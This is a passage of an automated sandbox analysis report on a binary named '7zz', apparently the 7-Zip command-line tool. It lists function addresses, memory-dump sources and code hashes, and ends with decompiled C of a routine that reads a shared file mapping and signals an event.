				 *((intOrPtr*)(_t148 + 0x18)) =  *((intOrPtr*)(_t148 + 0x18)) + _v144;
				 *((intOrPtr*)(_t148 + 0x1c)) =  *((intOrPtr*)(_t148 + 0x1c)) + _v140;
				return _t148;
			}

0x00467424
0x00467420
0x0046742d
0x0046742f
0x00467433
0x00467455
0x00467478
0x0046749b
0x004674ba
0x004674be
0x004674c1
0x004674c4
0x004674d2
0x004674d9
0x004674e0
0x004674e7
0x004674ee
0x004674f5
0x004674fc
0x004674fe
0x00467502
0x00467506
0x00467510
0x00467517
0x0046751c
0x00467520
0x00467522
0x00467526
0x00467526
0x00467529
0x0046752d
0x00467535
0x00467537
0x00467596
0x0046759a
0x00467539
0x00467539
0x00467556
0x0046755c
0x0046755f
0x0046756b
0x00467570
0x00467589
0x00467590
0x00467592
0x00467592
0x004675ae
0x004675b8
0x004675be
0x004675c1
0x004675c8
0x004675cd
0x004675e5
0x004675eb
0x004675ef
0x004675f5
0x004675fd
0x00467607
0x0046760c
0x00467618
0x0046761d
0x00467624
0x00467629
0x00467641
0x00467647
0x0046764d
0x0046764e
0x00467651
0x00467652
0x00467652
0x00467656
0x0046765a
0x0046765a
0x00467664
0x00467667
0x0046766b
0x00467674
0x0046767f
0x00467685
0x0046768c
0x00467693
0x0046769e
0x004676a1
0x004676ac
0x004676af
0x004676bc

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f19d16c577e8e96f48197a8d4ea19eb6042dc0009dded39ed79d713b393dfd92
Instruction ID: bf7e81f7d522a4bd2434b6218b300959f5d02f60473a9509597fbdb11facc58e
Opcode Fuzzy Hash: f19d16c577e8e96f48197a8d4ea19eb6042dc0009dded39ed79d713b393dfd92
Instruction Fuzzy Hash: D0917FB29083658FC315DF49D88455AF7E1BFC4314F0B86AEE9995B322E270A905CFD2

Uniqueness

Uniqueness Score: -1.00%

Function 00458B30 Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b57f3487a312c1843c0612d4d0dfe37813ac96ab5f28ab3a19bd00fed39ce45
Instruction ID: fa9aeb9e0725e4ffef27b0fed8173ebd3e95ce29c77f6e3ebb7612827f398593
Opcode Fuzzy Hash: 5b57f3487a312c1843c0612d4d0dfe37813ac96ab5f28ab3a19bd00fed39ce45
Instruction Fuzzy Hash: 2C510AB2B087514BD308DE6DCC9073AB6D2EBD4304F48863EE496D3385EA78DA1987D5

Uniqueness

Uniqueness Score: -1.00%

Function 00467220 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8c2fe7712ed8c324610458340f6dfe7cc075e40e23d43facc7c46b85be0f4af
Instruction ID: ecbefbb19e359fe605fb64fccd1c45d94721ec601b361607b774bfcf3dbab90b
Opcode Fuzzy Hash: f8c2fe7712ed8c324610458340f6dfe7cc075e40e23d43facc7c46b85be0f4af
Instruction Fuzzy Hash: 026148725087118FC318DF49D48494AF3E1FFC8328F1A8A6DEA885B361D771E959CB86

Uniqueness

Uniqueness Score: -1.00%

Function 004677D0 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a36bb598b2f6ffa26dc0ad72d3b0d69c2e5a9c4510fe4b52411aaaf790342bc6
Instruction ID: 438bb65c29240fe6531fe6a72d8d89a3992cb7e1a35f4f069cc153bc5eaea4f0
Opcode Fuzzy Hash: a36bb598b2f6ffa26dc0ad72d3b0d69c2e5a9c4510fe4b52411aaaf790342bc6
Instruction Fuzzy Hash: D561835510DBD59AC326CF3998900A5FFF0AE67101708879DE8E543F86C228F668CBF6

Uniqueness

Uniqueness Score: -1.00%

Function 00459F80 Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6b86c033f61a550a540284f83686b7dc165fdcb51ba861993bc3e277ac7de85
Instruction ID: fd88af4a55426da6948f54a871f8da9c8cc7ad7d325161158fb5f24926afe266
Opcode Fuzzy Hash: e6b86c033f61a550a540284f83686b7dc165fdcb51ba861993bc3e277ac7de85
Instruction Fuzzy Hash: CE512B75610B098FC724CF29C48066BB3E2FB88305B148A2ED99787B86DB75E859CB45

Uniqueness

Uniqueness Score: -1.00%

Function 00456830 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d037a9f2a6bac70cdbc0ea4a6beeae294910fb94d9119d9e185bc861c6541ff
Instruction ID: 64b7cb02cb4575982e1680b9360a4aaf235b5430a9cb7fa29c26ced03b2a631a
Opcode Fuzzy Hash: 4d037a9f2a6bac70cdbc0ea4a6beeae294910fb94d9119d9e185bc861c6541ff
Instruction Fuzzy Hash: BA41D471B20A201AB30CCF3A8CC41662BC3D7CA39A745C73EC595C66D9DABDC517C6A8

Uniqueness

Uniqueness Score: -1.00%

Function 004217DA Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23c8aaa3664de804fa2ce29b316b560c6082957a249a83d654323075b2432b7d
Instruction ID: 58285889abc0c4558893f753c2962dba04340085c6fb08ee3641d5c85bffa47e
Opcode Fuzzy Hash: 23c8aaa3664de804fa2ce29b316b560c6082957a249a83d654323075b2432b7d
Instruction Fuzzy Hash: 92318C7BE75C3402E388883ACC233A7504397D5734B6ED3797C76EA2D9EDAD98810194

Uniqueness

Uniqueness Score: -1.00%

Function 0046A2A0 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9ad90c045aee2e314f446bae37fd2ae8d495a05db838e50cc6b87b586cac8e5
Instruction ID: 55640d85d086321eab8c1dde6dfc87ccde0e417aff073f041b781c99bee8189f
Opcode Fuzzy Hash: d9ad90c045aee2e314f446bae37fd2ae8d495a05db838e50cc6b87b586cac8e5
Instruction Fuzzy Hash: 86314DB1E046B606F3109E3F8C4012AB7D3AFC2211F18C6BAE5954B78AEA359592C756

Uniqueness

Uniqueness Score: -1.00%

Function 004729A3 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e781e73348b070714efe4b9f1f387dbcbf5b044bf6c7f23a7a0004d2e0ca769a
Instruction ID: 5cb57f84dd04878d09e3172b721f2800985639ad8fca4f63b4680496e6127096
Opcode Fuzzy Hash: e781e73348b070714efe4b9f1f387dbcbf5b044bf6c7f23a7a0004d2e0ca769a
Instruction Fuzzy Hash: 2441C360C14F9652EB234F7CC842272B320BFAB204F00D76AFDD1B9923FB726544A255

Uniqueness

Uniqueness Score: -1.00%

Function 00447150 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b71167f41ca9b4d6a0c5eec9fd16e49cfac46e0cfb7b91671476faf95e24c566
Instruction ID: 6d1edcbece74eb57210dc0e7beee4c9fd278fcd77491b57e59e489f7b1564d5e
Opcode Fuzzy Hash: b71167f41ca9b4d6a0c5eec9fd16e49cfac46e0cfb7b91671476faf95e24c566
Instruction Fuzzy Hash: A2217135708A468FD728DE59D89042BB3D2EFD9300B14893EE59AC7341DB34ED16CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004075F5 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f56a834658a142d23c883f927dcf220af920912c48db6f46e73b3a04251ebec
Instruction ID: 60f2abb042d568358b40e754ba457d932247b1fa21c2b58f39a36cc5b0bafb4f
Opcode Fuzzy Hash: 4f56a834658a142d23c883f927dcf220af920912c48db6f46e73b3a04251ebec
Instruction Fuzzy Hash: 74210D6E374D0607A71C8B69AD776B921C1E346309788A03EE68BC53C1EF6C9895C14E

Uniqueness

Uniqueness Score: -1.00%

Function 00459E70 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 772e87da75b6b7c62898645b4c777575a3ccfa1faee4ffe1159f4fb115bb9a44
Instruction ID: c9cb9fdb4045278a2449ae7dde7cf1f47b93b7590a933fb60e95c99ee0c0d7ef
Opcode Fuzzy Hash: 772e87da75b6b7c62898645b4c777575a3ccfa1faee4ffe1159f4fb115bb9a44
Instruction Fuzzy Hash: 4A11E97E270D0647A75C876DAC336B921C1E784309798A13DE54BCA3C2EF6EC896C648

Uniqueness

Uniqueness Score: -1.00%

Function 00472B30 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d500e99f8a94672710fdab3da84f4ff88beaa55a68f080d6b94a73964fb8a436
Instruction ID: 841e742ca2b343ce69cf51eeea2c428e43b70acb97c5447e4c3c03e40b730c9e
Opcode Fuzzy Hash: d500e99f8a94672710fdab3da84f4ff88beaa55a68f080d6b94a73964fb8a436
Instruction Fuzzy Hash: 1E21C832D046254BC752CE6DE5C45A7F3D1FBC436AF578627ED8867290C528B85486E0

Uniqueness

Uniqueness Score: -1.00%

Function 00472C0B Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
Instruction ID: 3aa8b7520b6c29b039fcb8c41eb560a1c276bd8b531b3edbaf52973018cb75c7
Opcode Fuzzy Hash: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
Instruction Fuzzy Hash: 252149725104254FC302DF2DE5886BBB3E1FFE4319F63CA3BD9858B281C628D844D6A0

Uniqueness

Uniqueness Score: -1.00%

Function 00467DF0 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ecd423abf8d12d569651e76baacbb0d3a431eb5772cb9eead9adf98d25e71c8
Instruction ID: b78d2f010eb93d32e26cf5c608ccc4120652c667b8c513f2aad868e42285089d
Opcode Fuzzy Hash: 4ecd423abf8d12d569651e76baacbb0d3a431eb5772cb9eead9adf98d25e71c8
Instruction Fuzzy Hash: 5D0121552A628989D781DA7DC490348FE80F756307F9CC3E5E0C8CBF42D58EC54AC3A1

Uniqueness

Uniqueness Score: -1.00%

Function 00410DFA Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 183
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00410DFA(intOrPtr __ecx, void* __edx) {
				void* _t63;
				void* _t68;
				void* _t75;
				long _t76;
				void* _t83;
				void* _t90;
				void* _t134;
				void* _t135;
				long _t142;
				signed int _t144;
				void* _t145;
				void* _t147;
				void* _t149;

				E0046B890(E00474220, _t147);
				 *((intOrPtr*)(_t147 - 0x10)) = _t149 - 0x58;
				_t134 = __edx;
				 *((intOrPtr*)(_t147 - 0x20)) = __ecx;
				_t63 = E00411BA8(__edx, 0x3a, 0);
				_t138 = _t63;
				if(_t63 < 0) {
					L0040FFF2();
				}
				E00407399(_t134, _t147 - 0x64, _t138);
				 *(_t147 - 4) = 0;
				E004072C9(_t134, _t147 - 0x40, _t138 + 1);
				 *(_t147 - 4) = 1;
				_t68 = E00411BA8(_t147 - 0x40, 0x3a, 0);
				_t140 = _t68;
				if(_t68 < 0) {
					L0040FFF2();
				}
				E00407399(_t147 - 0x40, _t147 - 0x58, _t140);
				 *(_t147 - 4) = 2;
				E004072C9(_t147 - 0x40, _t147 - 0x4c, _t140 + 1);
				 *(_t147 - 4) = 3;
				_t142 = E004082A1( *((intOrPtr*)(_t147 - 0x58)), 0);
				 *(_t147 - 0x24) = 0;
				 *(_t147 - 0x18) = 0;
				_t131 = _t147 - 0x64;
				 *(_t147 - 4) = 4;
				_t75 = OpenFileMappingA(4, 0,  *(E0041AE3F()));
				 *(_t147 - 0x18) = _t75;
				if(_t75 == 0) {
					_t76 = GetLastError();
				} else {
					_t76 = 0;
				}
				 *((char*)(_t147 - 0x11)) = _t76 != 0;
				E00407A18( *((intOrPtr*)(_t147 - 0x34)));
				if( *((intOrPtr*)(_t147 - 0x11)) != 0) {
					L0040FFFD("Can not open mapping");
				}
				_t135 = MapViewOfFile( *(_t147 - 0x18), 4, 0, 0, _t142);
				 *(_t147 - 0x24) = _t135;
				if(_t135 == 0) {
					L0040FFFD("MapViewOfFile error");
				}
				 *(_t147 - 4) = 5;
				if( *_t135 != 0) {
					L0040FFFD("Incorrect mapping data");
				}
				 *(_t147 - 0x1c) = _t142 >> 1;
				 *((intOrPtr*)(_t147 - 0x34)) = 0;
				 *(_t147 - 0x30) = 0;
				 *((intOrPtr*)(_t147 - 0x2c)) = 0;
				E00401E9A(_t147 - 0x34, 3);
				 *(_t147 - 4) = 6;
				_t144 = 1;
				while(_t144 <  *(_t147 - 0x1c)) {
					_t94 =  *((intOrPtr*)(_t135 + _t144 * 2));
					if( *((intOrPtr*)(_t135 + _t144 * 2)) != 0) {
						E004054FE(_t147 - 0x34, _t131, __eflags, _t94);
					} else {
						_t131 = _t147 - 0x34;
						E00410AC9( *((intOrPtr*)(_t147 - 0x20)), _t147 - 0x34,  *((intOrPtr*)(_t147 + 8)),  *(_t147 + 0xc));
						 *(_t147 - 0x30) = 0;
						 *((short*)( *((intOrPtr*)(_t147 - 0x34)))) = 0;
					}
					_t144 = _t144 + 1;
				}
				__eflags =  *(_t147 - 0x30);
				if( *(_t147 - 0x30) != 0) {
					L0040FFFD("data error");
				}
				E00407A18( *((intOrPtr*)(_t147 - 0x34)));
				 *(_t147 - 4) = 4;
				UnmapViewOfFile(_t135);
				__eflags =  *(_t147 - 0x18);
				if( *(_t147 - 0x18) != 0) {
					CloseHandle( *(_t147 - 0x18));
				}
				 *(_t147 + 0xc) = 0;
				 *(_t147 - 4) = 8;
				_t83 = OpenEventA(2, 0,  *(E0041AE3F()));
				__eflags = _t83;
				 *(_t147 + 0xc) = _t83;
				if(_t83 == 0) {
					_t145 = GetLastError();
				} else {
					_t145 = 0;
				}
				E00407A18( *((intOrPtr*)(_t147 - 0x34)));
				__eflags = _t145;
				if(_t145 == 0) {
					E00467B10(_t147 + 0xc);
				}
				E00467A90(_t147 + 0xc);
				E00407A18( *((intOrPtr*)(_t147 - 0x4c)));
				E00407A18( *((intOrPtr*)(_t147 - 0x58)));
				E00407A18( *((intOrPtr*)(_t147 - 0x40)));
				_t90 = E00407A18( *((intOrPtr*)(_t147 - 0x64)));
